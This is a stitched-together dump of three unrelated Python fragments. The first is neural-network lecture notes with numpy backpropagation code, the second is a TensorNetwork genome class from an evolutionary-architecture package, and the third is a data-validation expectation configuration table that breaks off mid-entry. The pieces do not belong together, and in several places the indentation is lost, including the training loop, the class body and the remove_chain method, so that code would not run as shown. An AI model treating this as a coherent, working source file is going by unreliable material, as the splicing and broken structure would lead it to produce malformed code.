where $f'(z_{h})$ is the derivative of the activation in the hidden layer. The matrix products mean
that we are summing up the products for each neuron in the output layer. The symbol $\circ$ denotes
the *Hadamard product*, meaning element-wise multiplication.
This again gives us the gradients in the hidden layer:
$$ \nabla W_{h} = X^T \delta_h = (n_{features}, n_{hidden}) ,$$
$$ \nabla b_{h} = \sum_{i=1}^{n_{inputs}} \delta_h = (n_{hidden}) .$$
# to categorical turns our integer vector into a onehot representation
from sklearn.metrics import accuracy_score
# one-hot in numpy
def to_categorical_numpy(integer_vector):
    """Return the one-hot encoding of an integer label vector.

    The number of columns is inferred as ``max(integer_vector) + 1``, so
    labels are assumed to be non-negative integers starting at 0.
    """
    num_samples = len(integer_vector)
    num_classes = np.max(integer_vector) + 1
    onehot = np.zeros((num_samples, num_classes))
    # Fancy indexing: set exactly one 1 per row, at the label's column.
    onehot[np.arange(num_samples), integer_vector] = 1
    return onehot
#Y_train_onehot, Y_test_onehot = to_categorical(Y_train), to_categorical(Y_test)
Y_train_onehot, Y_test_onehot = to_categorical_numpy(Y_train), to_categorical_numpy(Y_test)
def feed_forward_train(X):
    """Forward pass that also returns the hidden activations.

    Unlike plain inference we keep ``a_h`` because backpropagation needs
    the hidden-layer activations to compute gradients.
    Relies on the notebook globals ``hidden_weights``, ``hidden_bias``,
    ``output_weights``, ``output_bias`` and ``sigmoid``.
    """
    # hidden layer: affine transform followed by sigmoid activation
    a_h = sigmoid(np.matmul(X, hidden_weights) + hidden_bias)
    # output layer: affine transform followed by softmax
    z_o = np.matmul(a_h, output_weights) + output_bias
    # softmax over axis 1 (the category axis); axis 0 indexes the inputs
    exp_z = np.exp(z_o)
    probabilities = exp_z / exp_z.sum(axis=1, keepdims=True)
    return a_h, probabilities
def backpropagation(X, Y):
    """One backward pass; returns gradients for all weights and biases.

    ``Y`` must be one-hot encoded. Returns, in order: output-weight
    gradient, output-bias gradient, hidden-weight gradient, hidden-bias
    gradient. Relies on the notebook global ``output_weights`` and on
    ``feed_forward_train``.
    """
    a_h, probabilities = feed_forward_train(X)
    # delta at the output: softmax probabilities minus one-hot targets
    delta_o = probabilities - Y
    # propagate back through the output weights; sigmoid' = a*(1-a)
    delta_h = (delta_o @ output_weights.T) * a_h * (1 - a_h)
    # gradients are activations^T @ deltas; biases sum deltas over inputs
    grad_w_out = a_h.T @ delta_o
    grad_b_out = delta_o.sum(axis=0)
    grad_w_hidden = X.T @ delta_h
    grad_b_hidden = delta_h.sum(axis=0)
    return grad_w_out, grad_b_out, grad_w_hidden, grad_b_hidden
print("Old accuracy on training data: " + str(accuracy_score(predict(X_train), Y_train)))
eta = 0.01
lmbd = 0.01
for i in range(1000):
# calculate gradients
dWo, dBo, dWh, dBh = backpropagation(X_train, Y_train_onehot)
# regularization term gradients
dWo += lmbd * output_weights
dWh += lmbd * hidden_weights
# update weights and biases
output_weights -= eta * dWo
output_bias -= eta * dBo
hidden_weights -= eta * dWh
hidden_bias -= eta * dBh
print("New accuracy on training data: " + str(accuracy_score(predict(X_train), Y_train)))
## Improving performance
As we can see the network does not seem to be learning at all. It seems to be just guessing the label for each image.
In order to obtain a network that does something useful, we will have to do a bit more work.
The choice of *hyperparameters* such as learning | |
"""defines a Tensor Network, which is the class that holds most of our genome information"""
import copy
import itertools
import json
import time
import random
import tensorflow as tf
import networkx as nx
from matplotlib import pyplot as plt
from tensorEvolution import tensor_encoder, evo_config
from tensorEvolution.nodes import tensor_node, io_nodes, node_utils, basic_nodes
class TensorNetwork:
"""Holds all the information that defines the NN gnome"""
id_iter = itertools.count(100)
def __init__(self, input_shapes: list, output_units: list, connected=True,
             preprocessing_layers: list = None, initial_nodes: list = None):
    """Create a genome network.

    Args:
        input_shapes: one shape (tuple) per model input
        output_units: unit count for each output node
        connected: when True, immediately build the input, preprocessing,
            initial and output nodes and wire them together; when False an
            empty shell is returned (used by deserialize and cloning)
        preprocessing_layers: optional preprocessing layer stack per input
        initial_nodes: optional stack of initial nodes per input
    """
    self.graph = nx.MultiDiGraph()  # topology only; node objects live in all_nodes
    self.net_id = next(TensorNetwork.id_iter)  # unique id from the class counter
    self.all_nodes = {}  # node id -> node object
    # id lists by role, filled in by register_node
    self.input_ids = []
    self.output_ids = []
    self.preprocessing_ids = []
    self.initial_ids = []
    self.input_shapes = input_shapes
    self.output_units = output_units
    self.complexity = 0
    if connected:
        self._create_inputs(input_shapes)
        self._create_prenodes_and_outputs(output_units,
                                          preprocessing_layers=preprocessing_layers,
                                          initial_nodes=initial_nodes)
def serialize(self) -> dict:
    """Return a serializable dict representation of this network."""
    # Deep-copy the instance state so the caller cannot mutate us through
    # the returned structure.
    state = copy.deepcopy(self.__dict__)
    # Replace the graph with its node-link representation and each node
    # object with its own serialized form.
    state['graph'] = nx.node_link_data(self.graph)
    for node_id in self.all_nodes:
        state['all_nodes'][node_id] = self.all_nodes[node_id].serialize()
    return state
@staticmethod
def deserialize(tn_dict: dict):
    """Builds a new tensor network from serialized instance

    Args:
        tn_dict: Serialized Tensor Network

    Returns:
        A reconstructed TensorNetwork.
    """
    # Start from a disconnected shell and restore state wholesale.
    tensor_net = TensorNetwork(None, None, False)
    tensor_net.__dict__ = tn_dict
    # Serialization (e.g. JSON) stringifies ints and dict keys; coerce back.
    tensor_net.net_id = int(tensor_net.net_id)
    tensor_net.all_nodes = {int(k): v for (k, v) in tensor_net.all_nodes.items()}
    # Rebuild the graph from node-link data, then replace each serialized
    # node dict with a real node object.
    tensor_net.graph = nx.node_link_graph(tn_dict['graph'])
    for node_id, serial_node in tensor_net.all_nodes.items():
        tensor_net.all_nodes[node_id] = node_utils.deserialize_node(serial_node)
    # Shapes round-trip as lists; convert back to tuples.
    for index, shape in enumerate(tensor_net.input_shapes):
        tensor_net.input_shapes[index] = tuple(shape)
    return tensor_net
def __deepcopy__(self, memodict=None):
    """Deep-copy hook used by ``copy.deepcopy``.

    Delegates to :meth:`_clone`, which rebuilds the network node by node;
    the memo dict is accepted for protocol compatibility but ignored.

    Fix: the previous signature used a mutable default (``memodict={}``),
    a classic Python pitfall — the same dict object would be shared across
    all calls that omit the argument.
    """
    return self._clone()
def _clone(self):
    """Build a structural copy of this network with freshly-minted node ids.

    Each node is cloned individually and re-registered on a new disconnected
    TensorNetwork, then every edge is recreated using the id mapping.
    """
    clone_tn = TensorNetwork(self.input_shapes, self.output_units, connected=False)
    node_cross_ref = {}  # old node id -> new (cloned) node id
    for node_id, node in self.all_nodes.items():
        cloned_node = node.clone()
        label_override = None
        # Initial nodes would otherwise be re-labelled by their own type;
        # force the "InitialNode" label so they land in initial_ids again.
        if cloned_node.is_initial_node:
            label_override = "InitialNode"
        clone_tn.register_node(cloned_node, label_override=label_override)
        node_cross_ref[node_id] = cloned_node.id
    # Recreate every edge (MultiDiGraph: parallel edges are iterated too),
    # translated to the new node ids.
    for edge in self.graph.edges:
        old_start_node = edge[0]
        old_end_node = edge[1]
        new_start_node = node_cross_ref[old_start_node]
        new_end_node = node_cross_ref[old_end_node]
        clone_tn.graph.add_edge(new_start_node, new_end_node)
    return clone_tn
def _create_inputs(self, input_shapes: list):
    """Create and register one InputNode per requested input shape."""
    for input_shape in input_shapes:
        self.register_node(io_nodes.InputNode(input_shape))
def _create_prenodes_and_outputs(self, output_units: list,
                                 preprocessing_layers: list = None,
                                 initial_nodes: list = None):
    """Create output nodes, per-input preprocessing/initial chains, and
    wire everything together.

    Args:
        output_units: unit count for each output node to create
        preprocessing_layers: optional list with one preprocessing layer
            stack per input (indexed in step with self.input_ids)
        initial_nodes: optional list with one stack of initial nodes per
            input; nodes in a stack are chained one after another
    """
    # start by creating all the output nodes
    for units in output_units:
        output_node = io_nodes.OutputNode(units)
        self.register_node(output_node)
    # now work forward from the inputs
    # Handles multiple inputs, assumes there is a preprocessing list defined for each
    for index, input_id in enumerate(self.input_ids):
        if preprocessing_layers is not None:
            # create preprocessing nodes for each input
            preprocess_node = basic_nodes.PreprocessingNode(preprocessing_layers[index], index)
            self.register_node(preprocess_node)
            # connect this preprocessing node to the relevant input node
            self.graph.add_edge(input_id, preprocess_node.id)
        if initial_nodes is not None:
            initial_node_stack = initial_nodes[index]
            for initial_node in initial_node_stack:
                initial_node.is_initial_node = True
                self.register_node(initial_node, label_override="InitialNode")
                # append to the end of whatever chain (preprocessing and/or
                # previously-added initial nodes) already follows this input
                parent_id = input_id
                successors = self.get_successor_chain_ids(input_id)
                if len(successors) > 0:
                    # already has preprocessing node(s)
                    parent_id = successors[-1]
                self.graph.add_edge(parent_id, initial_node.id)
        # make the final connection to the outputs
        for output_id in self.output_ids:
            parent_id = input_id
            successors = self.get_successor_chain_ids(input_id)
            if len(successors) > 0:
                parent_id = successors[-1]
            # mark node as final node in preprocessing/initial chain
            self.all_nodes[parent_id].is_end_initial_chain = True
            self.graph.add_edge(parent_id, output_id)
    # deal with multiple inputs being hooked into an output
    for output_id in self.output_ids:
        parents = get_parents(self, self.all_nodes[output_id])
        if len(parents) > 1:
            # pick a randomly-chosen reducing node (from config) to merge
            # the multiple parents into a single edge into the output
            multi_to_single = evo_config.master_config.config["multiple_to_single"]
            selection = random.choice(multi_to_single)
            reducing_node = node_utils.create(selection)
            self.register_node(reducing_node)
            for parent in parents:
                # MultiDiGraph may hold parallel edges; drop them all
                while self.graph.has_edge(parent.id, output_id):
                    self.graph.remove_edge(parent.id, output_id)
                self.graph.add_edge(parent.id, reducing_node.id)
            self.graph.add_edge(reducing_node.id, output_id)
def insert_node_before(self, new_node: tensor_node.TensorNode, existing_node_id=None,
                       parent_id=None, integrity_check=False):
    """inserts node before the given position.
    Positions refer to the index in the "non_input_nodes" list,
    which is kept in no particular order

    Args:
        :param new_node: node to be inserted
        :param parent_id: id of parent if explicitly given
        :param integrity_check: True if this request made by an integrity check
        :param existing_node_id: id of the node to insert before
            (assuming random placement is false)
    """
    nodes = self.get_valid_insert_positions()
    # check if a specific location to insert before was given to us,
    # otherwise choose a location at random
    if existing_node_id is not None:
        child_node = nodes[existing_node_id]
    else:
        child_node = random.choice(list(nodes.values()))
    # gets a list of direct successor nodes
    parents = get_parents(self, child_node)
    if parent_id is not None:
        # we were provided with a specific parent ID. Nodes can have multiple parent,
        # and sometimes it is important to specify exactly where the inserted node is going
        parent = [node for node in parents if node.id == parent_id][0]
    else:
        # no explicit parent id given,
        # so pick a parent at random (could be there is only one parent)
        parent = random.choice(parents)  # could be multiple parents
    if integrity_check:
        # this insertion request came from an integrity check,
        # so we need to ensure that all connections between the parent
        # and child get a copy of this node inserted. The insertion
        # of this node between identified parent and child nodes is vital
        # to this network's functionality.
        while self.graph.has_edge(parent.id, child_node.id):
            # remove an edge between parent and child
            self.graph.remove_edge(parent.id, child_node.id)
            # copy the node so that each branch has its own version
            new_node_copy = new_node.clone()
            # register new node to be inserted
            self.register_node(new_node_copy)
            # add a new edge between parent and new node
            self.graph.add_edge(parent.id, new_node_copy.id)
            # add new edge between new node and child
            self.graph.add_edge(new_node_copy.id, child_node.id)
    else:
        # request has not come from an integrity check,
        # so just remove one of the (possibly) multiple edges between parent and child
        # remove an edge between parent and child.
        # This is just a standard mutation request,
        # not a vital node inserted to ensure the function of the network.
        self.graph.remove_edge(parent.id, child_node.id)
        # register new node to be inserted
        self.register_node(new_node)
        # add a new edge between parent and new node
        self.graph.add_edge(parent.id, new_node.id)
        # add new edge between new node and child
        self.graph.add_edge(new_node.id, child_node.id)
    if new_node.is_branch_termination:
        # branch-terminating nodes need a second incoming edge: pick a
        # branch origin somewhere among the new node's ancestors
        # get ids of all predecessors recursively back to input node
        all_parents_ids = self.get_parent_chain_ids(new_node)
        if (len(self.preprocessing_ids) > 0) or (len(self.initial_ids) > 0):
            # this network has either preprocessing or initial nodes associated with it
            # the input and initial/pre nodes shouldn't be considered valid
            # candidates for a branch, except for the final one
            removal_list = self.input_ids + self.initial_ids + self.preprocessing_ids
            removal_list = [x for x in removal_list if not self.all_nodes[x].is_end_initial_chain]
            all_parents_ids = [x for x in all_parents_ids if x not in removal_list]
        branch_origin = random.choice(all_parents_ids)
        self.graph.add_edge(branch_origin, new_node.id)
def delete_node(self, node_id, replacement_node=None):
    """
    deletes a node from the network

    :param node_id: node to delete
    :param replacement_node: None, unless you intend to replace the node instead of delete it
    """
    replace = False
    if replacement_node is not None:
        replace = True
    node_to_remove = self.get_a_middle_node(node_id=node_id)
    if node_to_remove.is_branch_termination:
        return  # deletion of branch endpoints not currently supported
    # capture neighbors before removal so the graph can be re-wired after
    parents = get_parents(self, node_to_remove)
    children = self.get_children(node_to_remove)
    while self.graph.has_node(node_to_remove.id):
        self.graph.remove_node(node_to_remove.id)  # also removes adjacent edges
    self.all_nodes.pop(node_to_remove.id)
    if replace:
        # splice the replacement node into the hole left by the removal
        self.register_node(replacement_node)
        for parent in parents:
            self.graph.add_edge(parent.id, replacement_node.id)
        for child in children:
            self.graph.add_edge(replacement_node.id, child.id)
    else:
        # heal the graph: connect every former parent to every former child
        for parent in parents:
            for child in children:
                self.graph.add_edge(parent.id, child.id)
def register_node(self, node: tensor_node.TensorNode, label_override=None):
    """
    registers a node with the network. Adds it to the graph which holds
    the network topology and to the main dict of nodes, and records its
    id in the role-specific id list matching its label.

    :param label_override: overrides the default logic which
        controls which list of ids the node gets added to
    :param node: node to register
    """
    self.all_nodes[node.id] = node
    label = node.get_label() if label_override is None else label_override
    self.graph.add_node(node.id, label=label)
    # Map each role label to the id list it populates; labels outside this
    # table (ordinary middle nodes) are tracked only in all_nodes/graph.
    role_lists = {
        "InputNode": self.input_ids,
        "OutputNode": self.output_ids,
        "PreprocessingNode": self.preprocessing_ids,
        "InitialNode": self.initial_ids,
    }
    id_list = role_lists.get(label)
    if id_list is not None:
        id_list.append(node.id)
# def replace_node(self, replacement_node: tensor_node.TensorNode,
# position=None, existing_node_id=None):
#
# old_node = self.get_a_middle_node(position, existing_node_id)
#
# if len(list(self.graph.predecessors(old_node.id))) > 1:
# raise ValueError("Tried to replace a node with multiple parents")
#
# self.all_nodes.pop(old_node.id)
# self.all_nodes[replacement_node.id] = replacement_node
#
# parents = self.get_parents(old_node)
# self.graph.remove_node()
# nx.relabel_nodes(self.graph, {old_node.id: replacement_node.id}, copy=False)
# self.graph.nodes[replacement_node.id]['label'] = replacement_node.get_label()
def remove_chain(self, id_chain: list, heal=True, replace=False, new_chain_nodes: list = None):
"""
Removes an entire chain of linked nodes
:param id_chain: list of node ids to be removed
:param heal: re-connect nodes after removal
:param replace: replace the removed chain with a new chain
:param new_chain_nodes: chain to replace with
"""
start_node = self.get_a_middle_node(node_id=id_chain[0])
end_node = self.get_a_middle_node(node_id=id_chain[-1])
start_parents = get_parents(self, start_node)
end_children = self.get_children(end_node)
for node_id in id_chain:
self.all_nodes.pop(node_id)
self.graph.remove_nodes_from(id_chain)
if heal:
for parent in start_parents:
for child in end_children:
self.graph.add_edge(parent.id, child.id)
if replace:
current_parents = start_parents
for node in new_chain_nodes:
self.register_node(node)
for parent in current_parents:
self.graph.add_edge(parent.id, node.id)
| |
not in metric_kwargs:
metric_kwargs[kwargs_id] = set()
for metric_name in metric_list:
metric_kwargs[kwargs_id].add(metric_name)
deduplicated[suite_name] = list(metrics)
if len(metric_kwargs) > 0:
deduplicated[suite_name] = deduplicated[suite_name] + [
{
"metric_kwargs_id": {
metric_kwargs: list(metrics_set)
for (metric_kwargs, metrics_set) in metric_kwargs.items()
}
}
]
return deduplicated
class ExpectationConfiguration(DictDot):
"""ExpectationConfiguration defines the parameters and name of a specific expectation."""
kwarg_lookup_dict = {
"expect_column_to_exist": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["column_index"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"column_index": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_columns_to_match_ordered_list": {
"domain_kwargs": [],
"success_kwargs": ["column_list"],
"default_kwarg_values": {
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_column_count_to_be_between": {
"domain_kwargs": [],
"success_kwargs": ["min_value", "max_value"],
"default_kwarg_values": {
"min_value": None,
"max_value": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_column_count_to_equal": {
"domain_kwargs": [],
"success_kwargs": ["value"],
"default_kwarg_values": {
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_row_count_to_be_between": {
"domain_kwargs": [],
"success_kwargs": ["min_value", "max_value"],
"default_kwarg_values": {
"min_value": None,
"max_value": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_row_count_to_equal": {
"domain_kwargs": [],
"success_kwargs": ["value"],
"default_kwarg_values": {
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_unique": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_not_be_null": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_null": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_of_type": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["type_", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_in_type_list": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["type_list", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_in_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "mostly", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_not_be_in_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "mostly", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"min_value",
"max_value",
"strict_min",
"strict_max",
"allow_cross_type_comparisons",
"parse_strings_as_datetimes",
"output_strftime_format",
"mostly",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"allow_cross_type_comparisons": None,
"parse_strings_as_datetimes": None,
"output_strftime_format": None,
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_increasing": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["strictly", "parse_strings_as_datetimes", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"strictly": None,
"parse_strings_as_datetimes": None,
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_decreasing": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["strictly", "parse_strings_as_datetimes", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"strictly": None,
"parse_strings_as_datetimes": None,
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_value_lengths_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_value_lengths_to_equal": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_match_regex": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["regex", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_not_match_regex": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["regex", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_match_regex_list": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["regex_list", "match_on", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"match_on": "any",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_not_match_regex_list": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["regex_list", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_match_strftime_format": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["strftime_format", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_dateutil_parseable": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_json_parseable": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_match_json_schema": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["json_schema", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_parameterized_distribution_ks_test_p_value_to_be_greater_than": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["distribution", "p_value", "params"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"p_value": 0.05,
"params": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_distinct_values_to_be_in_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_distinct_values_to_equal_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_distinct_values_to_contain_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_mean_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_median_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_quantile_values_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["quantile_ranges", "allow_relative_error"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"allow_relative_error": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_stdev_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_unique_value_count_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_proportion_of_unique_values_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_most_common_value_to_be_in_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "ties_okay"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"ties_okay": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_sum_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_min_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"min_value",
"max_value",
"strict_min",
"strict_max",
"parse_strings_as_datetimes",
"output_strftime_format",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"parse_strings_as_datetimes": None,
"output_strftime_format": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_max_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"min_value",
"max_value",
"strict_min",
"strict_max",
"parse_strings_as_datetimes",
"output_strftime_format",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"parse_strings_as_datetimes": None,
"output_strftime_format": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_chisquare_test_p_value_to_be_greater_than": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["partition_object", "p", "tail_weight_holdout"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"partition_object": None,
"p": 0.05,
"tail_weight_holdout": 0,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_bootstrapped_ks_test_p_value_to_be_greater_than": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"partition_object",
"p",
"bootstrap_samples",
"bootstrap_sample_size",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"partition_object": None,
"p": 0.05,
"bootstrap_samples": None,
"bootstrap_sample_size": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_kl_divergence_to_be_less_than": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"partition_object",
"threshold",
"tail_weight_holdout",
"internal_weight_holdout",
"bucketize_data",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"partition_object": None,
"threshold": None,
"tail_weight_holdout": 0,
"internal_weight_holdout": 0,
"bucketize_data": True,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_pair_values_to_be_equal": {
"domain_kwargs": [
"column_A",
"column_B",
"row_condition",
"condition_parser",
],
"success_kwargs": ["ignore_row_if"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
